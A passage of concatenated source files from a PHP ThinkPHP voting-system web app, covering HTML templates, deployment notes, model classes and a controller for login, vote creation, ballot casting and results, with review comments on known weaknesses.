{$vo} |
{/foreach}
</div>
</div>
{/if}
</div>
<div class="am-u-lg-1"> </div>
</div>
</li>
{/volist}
</ul>
</div>
</div>
</dd>
</dl>
</section>
</div>
</span>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
</body>
</html>
<file_sep>部署要求:
1.修改app目录下database.php中的MySQL用户名和密码以及端口
2.修改app目录下config.php中最后的WEB_ROOT配置,地址为public目录的上一级目录且不带最后一个反斜杠(/)
3.入口文件为public目录下的index.php
4.vote_system.sql为数据库文件,里面默认含有一个等级为4的管理员用户admin,登录密码为<PASSWORD>,用该用户登录后可以添加新用户。
5.如果部署到Linux服务器,请修改runtime文件夹和public文件夹下的uploads文件夹(如果没有可手动创建)的权限,使其拥有写入权限。
环境要求:
PHP7.0以上+MySQL+Apache
<file_sep><?php
/**
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 20:26
*/
namespace app\index\model;
use think\Model;
class Option extends Model {
/**
 * Bulk-insert the given option rows for a vote.
 *
 * @param array $options list of option rows (vote_id / img / content) to persist
 */
public function addOption(array $options) {
    $this->saveAll($options);
}
/**
 * Fetch every option of a vote, each annotated with its percentage of the
 * total ballot count.
 *
 * @param int $id id of the vote whose options are wanted
 * @return array list of option attribute arrays, each with an added
 *               'percent' key (0 when no ballots have been cast)
 */
public function getAllOptionById(int $id) : array {
    $where = array(
        "vote_id" => $id,
    );
    $result = $this->where($where)->select();
    $newResult = [];
    // Running total of ballots across all options, used as the denominator.
    $totalNumber = 0;
    if (count($result) > 0) {
        foreach ($result as $value) {
            // ->data reads the Model's protected attribute bag directly;
            // allowed here because Option shares the Model class hierarchy.
            $newResult[] = $value->data;
            $totalNumber += $value->data['number'];
        }
        foreach ($newResult as $key => $value) {
            if ($totalNumber == 0) {
                // Guard against division by zero when nobody has voted yet.
                $newResult[$key]['percent'] = 0;
            } else {
                $newResult[$key]['percent'] = round($newResult[$key]['number'] * 100 / $totalNumber, 1);
            }
        }
    }
    return $newResult;
}
/**
 * Collect the ids of every option attached to the given vote.
 *
 * @param int $voteId id of the vote whose option ids are wanted
 * @return array list of option ids
 */
public function getAllOptionIdByVoteId(int $voteId) : array {
    return $this->where("vote_id", $voteId)->column('id');
}
/**
 * Increment the tally of every option the user selected.
 *
 * Fixed: the previous implementation read the row, incremented in PHP and
 * wrote the full row back (keyed by every column), so two concurrent votes
 * could both read N and both write N+1, losing a ballot.
 *
 * @param array $postVoting list of selected option ids
 */
public function addNumber($postVoting) {
    foreach ($postVoting as $optionId) {
        // setInc issues "UPDATE ... SET number = number + 1 WHERE id = ?"
        // atomically, so concurrent submissions cannot clobber each other.
        $this->where('id', $optionId)->setInc('number');
    }
}
/**
 * Fetch a single option row by its primary id.
 *
 * NOTE(review): assumes the id exists — $result[0] raises an undefined-offset
 * notice otherwise. Current callers only pass ids read from this table;
 * confirm before exposing to raw user input.
 *
 * @param int $optionId primary key of the option
 * @return array raw attribute array of the matching row
 */
public function getOneOptionById(int $optionId) : array {
    $where = array(
        "id" => $optionId,
    );
    $result = $this->where($where)->select();
    // ->data accesses the Model's protected attribute bag directly; legal
    // here because Option shares the Model class hierarchy.
    return $result[0]->data;
}
}<file_sep><?php
/**
* 显示所有投票
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/10
* Time: 21:57
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<span class="am-show-md-down">
<div class="am-g">
<div class="am-u-sm-12">
<ul class="am-list am-list-static am-list-border">
{volist name='list' id='vote'}
<li>
<div data-am-widget="list_news" class="am-list-news am-list-news-default" >
<!--列表标题-->
<div class="am-list-news-hd am-cf">
<!--带更多链接-->
{if condition="(strtotime($vote.end_time) > time())"}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/votingPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr">{$vote.end_time}截至 | 投票 »</span>
</a>
{else /}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/resultPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr"> 查看结果 »</span>
<span class="am-list-news-more am-btn-danger am-fr">投票已结束</span>
</a>
{/if}
</div>
<div class="am-list-news-bd">
<ul class="am-list">
<li class="am-g am-list-item-dated">
<p>{$vote.introduction}</p>
</li>
</ul>
</div>
</li>
{/volist}
</ul>
<div class="am-g">
<div class="am-u-sm-4"> </div>
<div id="page" class="am-u-sm-4">
{$list->render()}
</div>
<div class="am-u-sm-4"> </div>
</div>
</div>
</div>
</span>
<span class="am-show-lg-only">
<div class="am-g">
<div class="am-u-sm-2"> </div>
<div class="am-u-sm-8">
<ul class="am-list am-list-static am-list-border">
{volist name='list' id='vote'}
<li>
<div data-am-widget="list_news" class="am-list-news am-list-news-default" >
<!--列表标题-->
<div class="am-list-news-hd am-cf">
<!--带更多链接-->
{if condition="(strtotime($vote.end_time) > time())"}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/votingPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr">{$vote.end_time}截至 | 投票 »</span>
</a>
{else /}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/resultPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr"> 查看结果 »</span>
<span class="am-list-news-more am-btn-danger am-fr">投票已结束</span>
</a>
{/if}
</div>
<div class="am-list-news-bd">
<ul class="am-list">
<li class="am-g am-list-item-dated">
<p>{$vote.introduction}</p>
</li>
</ul>
</div>
</li>
{/volist}
</ul>
<div class="am-g">
<div class="am-u-sm-4"> </div>
<div id="page" class="am-u-sm-4">
{$list->render()}
</div>
<div class="am-u-sm-4"> </div>
</div>
</div>
<div class="am-u-sm-2"> </div>
</div>
</span>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/votePage.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script>
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
</script>
</body>
</html>
<file_sep><?php
/**
* 投票选项log
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 22:35
*/
namespace app\index\model;
use think\Model;
class OptionLog extends Model {
/**
 * Record one audit row per option the user voted for.
 *
 * @param array  $postVoting option ids that were selected
 * @param string $username   account name of the voter
 */
public function addLog(array $postVoting, string $username) {
    $rows = [];
    foreach ($postVoting as $optionId) {
        $rows[] = [
            'op_time'  => date("Y-m-d H:i:s"),
            'log'      => $optionId,
            'username' => $username
        ];
    }
    $this->saveAll($rows);
}
/**
 * Map each option id to the list of usernames that voted for it.
 *
 * @param array $optionIds option ids belonging to one vote
 * @return array option id => array of voter usernames
 */
public function getResult(array $optionIds) : array {
    $voters = [];
    foreach ($optionIds as $optionId) {
        $voters[$optionId] = $this->where("log", $optionId)->column("username");
    }
    return $voters;
}
}<file_sep><?php
/**
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/13
* Time: 0:24
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>添加用户</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<div class="am-container">
</div>
<div class="am-g">
<div class="am-u-lg-3">
</div>
<div class="am-u-lg-6">
<!-- 移动端适配 -->
<span class="am-show-md-down">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
Register
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">账号</label>
<input type="text" class="account" placeholder="请输入账号">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">密码</label>
<input type="password" class="pwd1" placeholder="请输入密码">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">确认密码</label>
<input type="password" class="pwd2" placeholder="请再次输入密码">
</div>
<div class="am-form-group">
<label for="doc-select-1">等级</label>
<select class="grade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-select-1">开启管理员权限</label>
<select class="admin" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7">
<input type="text" class="captcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" /></div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">登 陆</button>
</fieldset>
</form>
</span>
<!-- PC端适配 -->
<span class="am-show-lg-only">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
Register
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">账号</label>
<input type="text" class="account" placeholder="请输入登陆账号">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">密码</label>
<input type="<PASSWORD>" class="pwd1" placeholder="<PASSWORD>">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">确认密码</label>
<input type="password" class="pwd2" placeholder="请再次输入密码">
</div>
<div class="am-form-group">
<label for="doc-select-1">等级</label>
<select class="grade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-select-1">开启管理员权限</label>
<select class="admin" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="captcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击图片刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">添 加</button>
</fieldset>
</form>
</span>
</div>
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
</div>
<!--交互信息提示-->
<div id="response">
</div>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/addUser.js"></script>
<script>
var captchaUrl = "{:captcha_src()}";
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
var grade = "{$user.grade}";
</script>
</body>
</html>
<file_sep><?php
/**
* 投票log
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 22:31
*/
namespace app\index\model;
use think\Model;
class VoteLog extends Model {
/**
 * Record that the given user has cast a ballot in the given vote.
 *
 * @param int    $voteId id of the vote that was participated in
 * @param string $opName account name of the voter
 */
public function addLog(int $voteId, string $opName) {
    $this->save([
        'log'       => $voteId,
        'vote_time' => date("Y-m-d H:i:s"),
        'username'  => $opName
    ]);
}
/**
 * Whether the user has already cast a ballot in the given vote.
 *
 * @param int    $voteId id of the vote
 * @param string $opName account name to check
 * @return bool true when at least one log row exists
 */
public function isVote(int $voteId, string $opName) : bool {
    $count = $this->where([
        'log'      => $voteId,
        'username' => $opName
    ])->count();
    return $count > 0;
}
}<file_sep><?php
/**
* Vote Model
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 0:06
*/
namespace app\index\model;
use think\Model;
define("PAGE_NUMBER", 10);
class Vote extends Model {
/**
 * Page through the votes visible to a user of the given grade, newest first.
 *
 * @param int $grade the user's grade; only votes with grade <= this are shown
 * @return \think\Paginator paginated vote list (PAGE_NUMBER rows per page)
 */
public function getVoteByGrade(int $grade) {
    // "grade <= $grade" replaces the old "$grade = $grade + 1; grade < $grade":
    // identical rows for integer grades, but the intent is explicit and the
    // parameter is no longer mutated.
    return $this->where("grade", "<=", $grade)->order("create_time desc")->paginate(PAGE_NUMBER);
}
/**
 * Insert a new vote and return its id.
 *
 * @param array $vote column => value map for the new vote row
 * @return int primary key of the row that was just inserted
 */
public function addVote(array $vote) : int {
    $this->save($vote);
    // getLastInsID() yields the auto-increment id of the row we just wrote.
    // The previous implementation re-queried by every attribute, which cost
    // an extra round trip and could return the wrong (oldest) row when two
    // identical votes existed.
    return (int)$this->getLastInsID();
}
/**
 * Whether a vote with the given id exists.
 *
 * @param int $id vote primary key
 * @return bool
 */
public function hasVote(int $id) : bool {
    // COUNT(*) instead of fetching entire rows just to test existence.
    return $this->where("id", $id)->count() > 0;
}
/**
 * Fetch a single vote row by id.
 *
 * NOTE(review): assumes the vote exists — $result[0] raises an
 * undefined-offset notice otherwise; callers should check hasVote() first.
 *
 * @param int $id vote primary key
 * @return array raw attribute array of the vote row
 */
public function getVoteById(int $id) : array {
    $where = array(
        "id" => $id,
    );
    $result = $this->where($where)->select();
    // ->data is the Model's protected attribute bag, reachable here because
    // Vote shares the Model class hierarchy.
    return $result[0]->data;
}
}<file_sep><?php
namespace app\index\controller;
use app\index\model\Option;
use app\index\model\OptionLog;
use app\index\model\User;
use app\index\model\Vote;
use app\index\model\VoteLog;
use think\Controller;
use think\Request;
use think\Session;
class Index extends Controller {
/**
 * Render the login page (site entry point).
 */
public function index() {
    return $this->fetch('login', ['footer' => footer()]);
}
/**
 * Validate the posted credentials and open a session on success.
 *
 * Expects POST fields: account, pwd, captcha.
 *
 * @return string JSON {"message": string, "status": "success"|"error"}
 */
public function loginCheck() : string {
    $user = new User();
    $status = "error";
    $message = "";
    $postData = Request::instance()->post("");
    if (isset($postData['account']) && isset($postData['pwd']) && isset($postData['captcha'])) {
        // Framework captcha rule: compares the posted code against the session.
        $captchaJudge = $this->validate(array('captcha' => $postData['captcha']), ['captcha|验证码'=>'require|captcha']);
        if ($captchaJudge === true) {
            if ($user->loginCheck($postData['account'], $postData['pwd'])) {
                $status = "success";
                $message = "";
                // The session key "name" is the sole login marker used elsewhere.
                Session::set("name", $postData['account']);
            } else {
                $status = "error";
                $message = "账号或者密码错误";
            }
        } else {
            $status = "error";
            $message = "验证码错误";
        };
    } else {
        $status = "error";
        $message = "请完整填写登录信息";
    }
    return json_encode(["message" => $message, "status" => $status]);
}
/**
 * Tear down the login session.
 *
 * @return string JSON {status, message}
 */
public function logout() : string {
    if (!Session::has("name")) {
        return json_encode(["status" => "error", "message" => "登出失败,你还没登陆"]);
    }
    Session::delete("name");
    return json_encode(["status" => "success", "message" => "登出成功"]);
}
/**
 * Render the paginated list of votes the current user may see.
 *
 * Anonymous visitors are treated as grade 0 / non-admin, so they still see
 * the grade-0 votes.
 *
 * @return mixed rendered template
 */
public function votePage() {
    $user = new User();
    $vote = new Vote();
    if ($this->isLogin()) {
        $name = Session::get("name");
        $userInfor = $user->getUser($name);
        $grade = $userInfor['grade'];
        $admin = $userInfor['admin'];
    } else {
        // Guest defaults: lowest grade, no admin rights, empty display name.
        $grade = 0;
        $admin = 0;
        $name = "";
    }
    $voteList = $vote->getVoteByGrade($grade);
    return $this->fetch('votePage', ['list' => $voteList, 'header' => getHeader("投票系统"), 'footer' => footer(), 'user' => ['name' => $name, 'admin' => $admin]]);
}
/**
 * Render the "create a vote" form; only for logged-in users.
 *
 * @return mixed rendered template
 */
public function createVote() {
    $user = new User();
    if ($this->isLogin()) {
        $name = Session::get("name");
        $userInfor = $user->getUser($name);
        $grade = $userInfor['grade'];
        $admin = $userInfor['admin'];
    } else {
        // NOTE(review): $this->error() throws and redirects, so the three
        // assignments below are dead code kept for symmetry with the branch above.
        $name = "";
        $admin = 0;
        $grade = 0;
        $this->error('登陆后方可发起投票', 'index');
    }
    return $this->fetch('addVote', ['header' => getHeader("发起投票—投票系统"), 'footer' => footer(), 'user' => ['name' => $name, 'admin' => $admin, 'grade' => $grade]]);
}
/**
 * Handle the "create vote" form POST: validate completeness and captcha,
 * store the vote row, then store its options (text and/or uploaded images).
 *
 * @return string JSON {status, message}
 */
public function addVote(){
    $status = "error";
    $message = "操作失败";
    if ($this->isLogin()) {
        $imgOption = request()->file();            // uploaded image options, if any
        $postMessage = Request::instance()->post();
        $imgOption == null ? $imgOption = array() : null;
        if ($this->isVote($postMessage)) {
            $status = "success";
        } else {
            $status = "error";
            $message = "信息不完整";
        }
        if ($status == "success") {
            $captchaJudge = $this->validate(array('captcha' => $postMessage['captcha']), ['captcha|验证码'=>'require|captcha']);
            if ($captchaJudge === true) {
                // Insert the vote first so the options can reference its id.
                $result = $this->saveVote($postMessage);
                if ($result['status']) {
                    $result = $this->saveOption($result['voteId'], $imgOption, $postMessage['option']);
                }
                $status = $result['status'] ? "success" : "error";
                $message = $result['message'];
            } else {
                $message = "验证码错误";
            }
        }
    } else {
        $message = "还未登录,不能进行此操作";
    }
    return json_encode(['status' => $status, 'message' => $message]);
}
/**
 * Check that the posted form contains every field a vote needs, each with a
 * non-empty value.
 *
 * Fixed: the previous implementation only inspected the keys that WERE
 * posted, so a request missing e.g. "title" entirely (with the other fields
 * present) was wrongly accepted. Extra posted keys are now ignored.
 *
 * @param array $postMessage raw POST data
 * @return bool true when all required fields are present and non-empty
 */
private function isVote(array $postMessage) : bool {
    $requireMessage = ["title", "endTime", "ano", "number", "captcha", "intro", "grade", "option"];
    foreach ($requireMessage as $field) {
        if (!isset($postMessage[$field]) || $postMessage[$field] == "") {
            return false;
        }
    }
    return true;
}
/**
 * Persist a new vote row built from the form data.
 *
 * @param array $postVote validated POST data (title/intro/grade/endTime/ano/number)
 * @return array ['status' => false, 'message' => string] on failure,
 *               ['status' => true, 'voteId' => int] on success
 */
private function saveVote(array $postVote) : array {
    $user = new User();
    $vote = new Vote();
    $userInfor = $user->getUser(Session::get("name"));
    // A user may not create a vote restricted to a grade above their own.
    if ($userInfor['grade'] < $postVote['grade']) {
        return ['status' => false, 'message' => "发起的投票等级比用户等级高"];
    }
    $newVote = [
        "create_time" => date('Y-m-d H:i:s'),
        "title" => $postVote['title'],
        "introduction" => $postVote['intro'],
        "grade" => $postVote['grade'],
        "end_time" => $postVote['endTime'],
        "create_name" => Session::get("name"),
        "anonymity" => $postVote['ano'],
        "vote_number" => $postVote['number']
    ];
    $id = $vote->addVote($newVote);
    return ['status' => true, 'voteId' => $id];
}
/**
 * Persist the options of a newly created vote.
 *
 * @param int    $voteId     id of the vote the options belong to
 * @param array  $imgOption  uploaded image files, keyed by "<caption>_<i>" or "null0_<i>"
 * @param string $textOption JSON map of text-only options (HTML-escaped)
 * @return array ['status' => bool, 'message' => string]
 */
private function saveOption(int $voteId, array $imgOption, string $textOption) : array {
    // The option text arrives JSON-encoded and HTML-escaped; undo both layers.
    $textOption = (Array)json_decode(htmlspecialchars_decode($textOption), true);
    $newOption = [];
    foreach ($textOption as $key => $value) {
        if ($key != "" && $value != "") {
            $newOption[] = [
                "vote_id" => $voteId,
                "img" => "null",           // "null" marks a text-only option
                "content" => $value
            ];
        }
    }
    if (count($imgOption) > 0) {
        foreach($imgOption as $key => $file){
            // Move the upload to <root>/public/uploads/, capped at 2 MB.
            $info = $file->validate(['size' => 2048 * 1024])->move(ROOT_PATH . 'public' . DS . 'uploads');
            if($info){
                $newOption[] = [
                    // "null0_<i>" keys mean "image with no caption"; the stored
                    // sentinel "null0_" is what the templates test for.
                    "content" => explode("_", $key)[0] == "null0" ? "null0_" : $key,
                    "vote_id" => $voteId,
                    "img" => $info->getSaveName(),
                ];
            }else{
                // Upload failed: keep the option row but with an empty image path.
                $newOption[] = [
                    "content" => explode("_", $key)[0] == "null0" ? "null0_" : $key,
                    "vote_id" => $voteId,
                    "img" => "",
                ];
            }
        }
    }
    $option = new Option();
    $option->addOption($newOption);
    return ['status' => true, 'message' => "成功发起投票"];
}
/**
 * Render the ballot page for one vote.
 *
 * Guards, in order: must be logged in, vote must exist, user grade must
 * reach the vote's grade, vote must still be open. ($this->error() throws,
 * so each failed guard ends the request.)
 *
 * @return mixed rendered template
 */
public function votingPage() {
    if (!$this->isLogin()) {
        $this->error('登陆后方可投票', 'index');
    }
    $id = Request::instance()->get("id");
    $user = new User();
    $vote = new Vote();
    $option = new Option();
    // Check existence BEFORE loading the row: the old code called
    // getVoteById() first, which crashed with an undefined-offset notice on
    // unknown ids instead of showing the friendly "投票不存在" page.
    if (!$vote->hasVote($id)) {
        $this->error("投票不存在");
    }
    $voteInfo = $vote->getVoteById($id);
    $name = Session::get("name");
    $userInfor = $user->getUser($name);
    $grade = $userInfor['grade'];
    $admin = $userInfor['admin'];
    if ($grade < $voteInfo['grade']) {
        $this->error('等级不够', 'index');
    }
    if ($this->isEnd($id)) {
        $this->error("投票已结束");
    }
    $optionInfo = $option->getAllOptionById($id);
    return $this->fetch('votingPage',
        [
            'optionList' => $optionInfo,
            'vote' => $voteInfo,
            'header' => getHeader("投票"),
            'footer' => footer(),
            'user' => ['name' => $name, 'admin' => $admin, 'grade' => $grade]
        ]);
}
/**
 * Whether the vote with the given id has passed its deadline.
 *
 * @param $voteId
 * @return bool
 */
private function isEnd($voteId) : bool {
    $vote = new Vote();
    $deadline = strtotime($vote->getVoteById($voteId)['end_time']);
    return $deadline < time();
}
/**
 * Handle a ballot submission (POST): run every guard, then bump the option
 * tallies and write both audit logs.
 *
 * POST fields: id (vote id) plus one field per chosen option id.
 *
 * @return string JSON {status, message}
 */
public function voting() {
    $status = "error";
    $message = "操作失败";
    if ($this->isLogin()) {
        $postVoting = Request::instance()->post();
        $voteId = $postVoting['id'];
        unset($postVoting['id']);
        // Collapse duplicate selections of the same option.
        $postVoting = array_unique($postVoting);
        $vote = new Vote();
        $option = new Option();
        $user = new User();
        $voteLog = new VoteLog();
        $optionLog = new OptionLog();
        $username = Session::get("name");
        if (!$vote->hasVote($voteId)) {
            $message = '投票不存在';
        } elseif (!$this->isOption($voteId, $postVoting)) {
            $message = '所选选项不是该投票的';
        } elseif ($this->isEnd($voteId)) {
            $message = '投票已结束';
        } elseif ($voteLog->isVote($voteId, $username)) {
            $message = '已投过票';
        } else {
            $voteInfo = $vote->getVoteById($voteId);
            $userInfo = $user->getUser($username);
            if ($voteInfo['grade'] > $userInfo['grade']) {
                $message = "等级不够";
            } elseif ($voteInfo['vote_number'] < count($postVoting)) {
                $message = "投票数超过最大投票数";
            } else {
                // All guards passed: tally, then log per-option and per-vote.
                $option->addNumber($postVoting);
                $optionLog->addLog($postVoting, $username);
                $voteLog->addLog($voteId, $username);
                $status = "success";
                $message = "投票成功";
            }
        }
    } else {
        $this->error('登陆后方可投票', 'index');
    }
    return json_encode(['status' => $status, 'message' => $message]);
}
/**
 * Check that every submitted option id belongs to the given vote.
 *
 * @param int   $voteId vote the ballot targets
 * @param array $voting submitted option ids
 * @return bool false for an empty selection or when any id is foreign to the vote
 */
private function isOption(int $voteId, array $voting) : bool {
    $option = new Option();
    $validIds = $option->getAllOptionIdByVoteId($voteId);
    // An empty selection is rejected, matching the original loop which never
    // set its flag to true in that case.
    if (count($voting) == 0) {
        return false;
    }
    foreach ($voting as $chosen) {
        if (!in_array($chosen, $validIds)) {
            return false;
        }
    }
    return true;
}
/**
 * Render the results page for one vote.
 *
 * Anonymous votes show tallies only; non-anonymous votes additionally
 * require sufficient grade and list who voted for each option.
 *
 * @return mixed rendered template
 */
public function resultPage() {
    if (!$this->isLogin()) {
        $this->error('登陆后方可投票', 'index');
    }
    $id = Request::instance()->get("id");
    $vote = new Vote();
    $user = new User();
    // Existence check first: the old code loaded the row before checking,
    // which crashed with an undefined-offset notice on unknown ids instead
    // of rendering the "投票不存在" error page.
    if (!$vote->hasVote($id)) {
        $this->error("投票不存在");
    }
    $voteInfo = $vote->getVoteById($id);
    $name = Session::get("name");
    $userInfo = $user->getUser($name);
    $option = new Option();
    $optionInfo = $option->getAllOptionById($id);
    if ($voteInfo['anonymity'] == 1) {
        // Anonymous vote: everyone may see the tallies, but no voter names.
        return $this->fetch('resultPage',
            [
                'optionList' => $optionInfo,
                'vote' => $voteInfo,
                'header' => getHeader("投票结果"),
                'footer' => footer(),
                'user' => ['name' => $name]
            ]);
    } else if ($voteInfo['grade'] > $userInfo['grade']) {
        $this->error("等级不够");
    } else {
        $optionId = $option->getAllOptionIdByVoteId($id);
        $optionLog = new OptionLog();
        $optionLogs = $optionLog->getResult($optionId);
        return $this->fetch('resultPage',
            [
                'optionLog' => $optionLogs,
                'optionList' => $optionInfo,
                'vote' => $voteInfo,
                'header' => getHeader("投票结果"),
                'footer' => footer(),
                'user' => ['name' => $name]
            ]);
    }
}
/**
 * Render the "add user" form; restricted to logged-in administrators.
 *
 * @return mixed rendered template
 */
public function addUserPage() {
    $user = new User();
    if (!$this->isLogin()) {
        $this->error('登陆后方可投票', 'index');
    } elseif (!$user->isAdmin(Session::get("name"))) {
        $this->error('只有管理员才可以进行该操作', 'index');
    } else {
        $name = Session::get("name");
        $userInfo = $user->getUser($name);
        // 'admin' => 1 is safe here: the isAdmin() guard above already passed.
        return $this->fetch('addUserPage', [
            'user' => ['admin' => 1, 'name' => $name, 'grade' => $userInfo['grade']],
            'header' => getHeader("添加用户"),
            'footer' => footer(),
        ]);
    }
}
    /**
     * 添加用户(AJAX 接口)。
     * Validation chain, first failure wins: logged in -> caller is admin ->
     * required fields present -> username free -> captcha ok -> username and
     * password charset ok -> passwords match -> caller's grade covers the new
     * user's grade. Result is returned as JSON {status, message}.
     * NOTE(review): the username-exists check runs before the captcha check,
     * so account existence can be probed without solving the captcha.
     * NOTE(review): passwords appear to be handled in plain text by the User
     * model — should be hashed before production use.
     * @return string JSON-encoded status/message
     */
    public function addUser() : string {
        $status = "error";
        $message = "";
